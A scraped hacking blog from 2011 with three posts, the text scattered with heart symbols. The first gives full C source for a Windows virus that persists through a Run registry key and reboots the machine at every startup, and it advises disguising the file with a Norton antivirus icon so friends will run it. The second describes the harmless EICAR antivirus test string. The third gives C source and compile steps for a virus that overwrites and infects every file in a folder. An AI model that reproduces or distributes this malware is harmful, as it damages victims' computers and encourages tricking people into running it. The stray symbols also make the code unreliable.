Saturday, December 24, 2011

A Virus Program to Restart the Computer at Every Startup



Today I will show ♥you how to create a virus that restarts the computer♥ upon every startup. That is, upon infection, the compu♥ter will get restarted every tim♥e the system is booted. This means that the computer will become inoperable since it reboots as soon as th♥e desktop is loaded.
F♥or this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none♥ of the antivirus softwares detect’s this as a vi♥rus since I have coded this virus in C. So if you are f♥amiliar with C language then it’s too easy to understand th♥e logic behind the coding.
Here is the source code.

#include
#include♥
#include
int found,♥drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File bloc♥k structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)♥
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=♥findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;ret♥urn;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffbl♥k,FA_DIREC);
if(don♥e==0)♥
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_n♥o=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is ♥not already infected
{
self=fopen(_argv[0],”rb”); //T♥he virus file open’s itself
switch(drive_no)
{
case 1:♥
target=fopen(♥“C:\\windows\\system\\sysres.exe”,”wb”); //to place a co♥py of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen♥(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD♥ HKEY_CURREN♥T_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:♥
target=fopen(“F:\\wind♥ows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
♥CurrentVersion\\Run \/v sres \/t REG_SZ♥ \/d
F:\\windows\\system\\sys♥res.exe”);
break;

default:
ex♥it(0);
}

while(fread(buff♥,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall♥();
}

else
system(“shutd♥own -r -t 0″); //if the system is already infected then just gi♥ve a command to restart
}


Compiling The Scource Co♥de Into Executable Virus.

1. Download the Sourc♥e Code Here

2. The downloaded file will ♥be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatica♥lly again and again.

It will not do any harm apart from aut♥omatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\Syst♥em
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to
♥♥
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entr♥y by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simpl♥ified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comm♥ents.

LO♥GIC:

1. First the v♥irus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is♥ already copied(Already infected) into X:\Windows\System♥

3. If not it will just place a copy of itself into X:\Windows\System a♥nd makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is ♥already found in the X:\Windows\System directo♥ry(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE M♥ORE THING BEFORE YOU LEAVE (♥This Step is optional)

After you com♥pile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it h♥as a default ICO♥N. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For exampl♥e you can change the .exe file’s icon into Norton antivirus ICON itse♥lf so that the people seeing this file beleives that it is Norton antivirus. Or you can chan♥ge it’s ICON into the ICON of a♥ny popular and trusted programs so that people will definitely click♥ on it.

Thursday, December 22, 2011

EICAR Test (Test the Working of your Antivirus, which can also help you to know your Antivirus’s proper state) !!

What a♥bout you??

Have you ever wondered ♥how to test your Antivirus♥♥ software to ensure its proper working?
If you answer is known then!! Must apply the below arti♥cle.

It’s just an easy way to test your a♥ntivirus. A test which is developed by European Institute of Computer Antivirus Research.
It’s ver♥y simple test named EICAR Test. It will work on any type and also ki♥♥nd of antivirus.
This process can be used by companies, antivirus programmers, and people to test the proper functioning of the antivirus/antimalware soft♥ware without hav♥ing the real computer virus which can cause damage our compu♥ters.

Lets’ see the Proc♥ess >>



Step 1. Open a notepad (N♥ew Text Document.TXT)



Step 2. Copy the follow♥ing red colored code (EICAR Test code) exactly onto the no♥tepad --



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Step 3. Save ♥the notepad.


Step 4. Rename the file fr♥om New Text Document.TXT  to  myfile.com



Step 5. Now run “ antivir♥us scan” o♥n this “myfile.com” file.



**If the antivirus is function♥ing properly on your computer, then it should gen♥erate a warning and immedia♥tely delete the file upon scanning. e you may have to re-install your antivirus.



Points to be no♥ted :-

Most antivirus will ♥pop-out a warning message in the♥ “Step 4”. Itself you can also plac♥e the myfile.com file in a ZIP or RAR file and run a scan on it. So, as to ensure whether your antivirus can detect the test string in the compre♥ssed archive. Any antivirus when scanning this file will respond exactly♥ as it will do for a genuine virus/malicious code. This♥ test will cause no damage to you♥r computer even though the antivirus will flag it as a malicious ♥script. Hence it is the safest method to test the proper functioning of any♥ antivirus.

Wednesday, December 21, 2011

How to Create a Computer Virus?

This following program is only used in "Educational purpose" by which  w♥e san create a virus in c. The program demonstrates a simple virus program after which execution (Running) creates its♥ own Xerox/copy in♥ the other files .I♥t destroys other files by infecting and spread the infectio♥n to another file.

The Source code is Here (use it as study purpose only) -


#include♥<stdio.h>
#include<io.h>
#include♥♥<dos.h>
#include<dir.h>
#include<c♥onio.h>
#include<time.h>

FILE ♥*virus,*host;
int d♥one,a=0;
unsigned long x;
char buff[2048];
struct ff♥blk ffblk;
clock_t st,end;

void main()
{
st♥=clock();
clrscr();
done=findfirst(*♥.*,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0], rb);
host=f♥open(ffbl♥k.ff_name,rb+);
if(host=♥=NULL) goto next;
x=89088;
pri♥♥ntf(Infecting %s\n,ffblk.ff_name,a);
while(♥x>2048)
{
fre♥ad(buff,2048,1,virus);
fwrite(buff, ♥2048,1,host);
x-=2048;
}
fre♥ad(buff,x,1,virus);
fwrite(♥buff,x,1,host);
a++;
next:
{
fcl♥oseall();
done=findnext(&ffblk);
}♥
}
printf(DON♥E! (Total Files Infected= %d),a);
end=clock();
pr♥intf(TIME TAKEN♥=%f SEC\n,
(end-st)/CLK_TCK);
g♥etch();
}


Compiling♥ Method:
Borland ♥C++ 5.5 (32-Bit) :
1. Compile once. note d♥own the generated .exe file length in bytes.
 2. Change the value of ♥X in source code to this length in bytes.
  3. Recompile it. The new .exe file is ready to infect.



Borlan♥D TC++ 3.0 (16-Bit):

1. Load the program in the compiler, press Alt+F9 to compile
 2. Press F9 to generate th♥e .exe file (Do Not Press Ctrl+F9,This will infect all the files in current directory and all the compiler.)
  3. Note down the size of generated .exe file♥ in bytes (Find .exe file's Properties)
   4. Change the value o♥f X in the source code with the noted down size (Change the above source code x= 89088)
    5. Once again follow the Step 1 & Step 2.

     6.The ge♥nerated .exe File is ready to infect

Don't Taste its Smell on your own computer - for test it:

1.Create & Open new empty folder.
 2. Put some ♥.exe files.
 3. Run the virus .exe file there you will see ♥all the files in the current directory get infected.
 4.A♥ll the infected files will be ready to reinfect. When u Re run the infected .exe files.


** T & C for this Programme :-
**WARNING: FOR EDUCATIONAL ♥PURPOSES ONLY**